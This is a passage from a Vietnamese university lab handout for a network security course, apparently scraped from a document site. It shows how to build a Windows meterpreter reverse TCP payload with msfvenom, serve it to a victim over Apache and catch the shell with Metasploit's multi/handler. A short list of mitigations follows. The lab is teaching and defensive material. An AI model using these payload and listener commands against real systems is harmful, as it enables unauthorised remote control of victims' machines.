You are on page 1of 13

TRƯỜNG ĐẠI HỌC CÔNG THƯƠNG TP.

HỒ CHÍ MINH
KHOA CÔNG NGHỆ THÔNG TIN

MÔN AN TOÀN MẠNG MÁY TÍNH


DIỄN TẬP - KIỂM THỬ TẤN CÔNG REVERSE TCP PAYLOAD VỚI METASPLOIT

1
AN TOÀN MẠNG MÁY TÍNH
Philipp Bùi Đỗ
Nội dung:

1. Mô hình ................................................................................................................................ 3
2. Mục tiêu ............................................................................................................................... 3
3. Kịch bản ............................................................................................................................... 3
4. Thực hiện ............................................................................................................................. 3
4.1. Tạo payload độc hại từ msfvenom .................................................................................... 3
4.2. Truyền nhiễm payload độc hại vào nạn nhân ................................................................... 5
4.3. Kẻ tấn công kiểm soát command shell phía nạn nhân ...................................................... 9
4.3. Triển khai các giải pháp giảm thiểu tấn công ................................................................. 12
5. Cơ sở lý thuyết ................................................................................................................... 13

2
AN TOÀN MẠNG MÁY TÍNH
Philipp Bùi Đỗ
1. Mô hình

Phần mềm triển khai: VMware Workstation, các hệ điều hành Kali Linux, Windows
Sinh viên tự thiết lập các thông số mạng, sau cho Attacker và Victim kết nối được với nhau
2. Mục tiêu
• Sử dụng Metasploit framework để thực hiện Kiểm thử tấn công Reverse TCP payload
• Phân tích và đề xuất các giải pháp giảm thiểu tấn công
3. Kịch bản
Sử dụng Metasploit framework trên máy Attacker (Kali Linux) để thực hiện một cuộc tấn công
Reverse TCP Shell nhằm truyền nhiễm payload độc hại đến máy Victim (Windows) trong môi
trường mạng LAN.
4. Thực hiện
4.1. Tạo payload độc hại từ msfvenom
4.2. Truyền nhiễm payload độc hại vào nạn nhân
4.3. Kẻ tấn công kiểm soát command shell phía nạn nhân
4.4. Triển khai c ác giải pháp giảm thiểu tấn công
4.1. Tạo payload độc hại từ msfvenom
1) Trên máy Attacker mở cửa sổ terminal và nhập lệnh “msfconsole” để chạy Metasploit

3
AN TOÀN MẠNG MÁY TÍNH
Philipp Bùi Đỗ
2) Nhập lệnh tạo payload độc hại: “msfvenom -p windows/meterpreter/reverse_tcp
LHOST=”IP ADDRESS” LPORT=4444 -f exe >”/Đường dẫn tới chỗ lưu file madoc.exe”
madoc.exe”.

4
AN TOÀN MẠNG MÁY TÍNH
Philipp Bùi Đỗ
4.2. Truyền nhiễm payload độc hại vào nạn nhân
1) Trong tab ‘msfconsole’ tạo listener để tạo kết nối thông qua lệnh ‘use
exploit/multi/handler’
2) Thiết lập payload handler trên máy Attacker:
- Nhập lệnh set payload/windows/meterpreter/reverse_tcp’ để liên kết với payload (thiết lập
5
AN TOÀN MẠNG MÁY TÍNH
Philipp Bùi Đỗ
- Khởi chạy payload: set LHOST IP ADD set LPORT 4444 (Kali port number), sau đó chọn
‘RUN’ hoặc ‘Exploit’

-
- Lắng nghe các kết nối trên port 4444
3) Sao chép tập tin chứa mã độc đã tạo trên thư mục /root/ đến /var/www/html: cp
/root/madoc.exe /var/www/html
4) Tiếp theo, chạy dịch vụ apache server với câu lệnh: SYSTEMCTL

6
AN TOÀN MẠNG MÁY TÍNH
Philipp Bùi Đỗ
5) Máy Victim nhập địa chỉ IP của máy Attacker trên trình duyệt web. Sau đó, tải và chạy tập
tin
6) Quan sát máy Attacker để thấy phiên meterpreter/payload được mở với kết nối Reverse TCP
tới máy Victim

7
AN TOÀN MẠNG MÁY TÍNH
Philipp Bùi Đỗ
8
AN TOÀN MẠNG MÁY TÍNH
Philipp Bùi Đỗ
4.3. Kẻ tấn công kiểm soát command shell phía nạn nhân

9
AN TOÀN MẠNG MÁY TÍNH
Philipp Bùi Đỗ
10
AN TOÀN MẠNG MÁY TÍNH
Philipp Bùi Đỗ
11
AN TOÀN MẠNG MÁY TÍNH
Philipp Bùi Đỗ
4.3. Triển khai các giải pháp giảm thiểu tấn công
Các giải pháp hạn chế bị tấn công reverse tcp payload

1. Cập nhật hệ thống: Đảm bảo rằng hệ thống của bạn được cập nhật với các bản vá bảo mật
mới nhất. Điều này giúp đóng gói các lỗ hổng có thể được lợi dụng bởi tấn công REVERSE
TCP PAYLOAD.

12
AN TOÀN MẠNG MÁY TÍNH
Philipp Bùi Đỗ
2. Tường lửa : Sử dụng tường lửa mạng để chặn kết nối đến các cổng TCP/UDP không cần
thiết và giới hạn quyền truy cập cho các cổng được sử dụng bởi Metasploit.
3. Mã hóa kết nối: Sử dụng giao thức mã hóa như SSL/TLS để bảo vệ kết nối giữa client và
server. Điều này làm tăng độ an toàn và ngăn chặn việc đánh cắp thông tin.
4. Giám sát và phát hiện xâm nhập: Thiết lập hệ thống giám sát mạng để theo dõi các hoạt
động không bình thường và phát hiện các tấn công REVERSE TCP PAYLOAD sớm nhất có thể.
5. Kiểm tra bảo mật: Thực hiện kiểm tra bảo mật thường xuyên để xác định các lỗ hổng trong
hệ thống và khắc phục chúng trước khi những kẻ tấn công khai thác chúng.
6. Giáo dục người dùng: Đào tạo nhân viên về các nguy cơ an ninh mạng, như làm thế nào để
nhận ra và tránh mở các tệp đính kèm không an toàn hoặc liên kết độc hại.
7. Quản lý đặc quyền: Giới hạn đặc quyền truy cập để ngăn chặn người dùng không cần thiết
có thể thực thi Metasploit và các công cụ tương tự.
8. Thay đổi cấu hình mạng: bạn có thể thay đổi cấu hình mạng để gây khó khăn cho tấn công
Reverse TCP Payload . Ví dụ: sử dụng proxy,giả mạo địa chỉ MAC.

5. Cơ sở lý thuyết

13
AN TOÀN MẠNG MÁY TÍNH
Philipp Bùi Đỗ

You might also like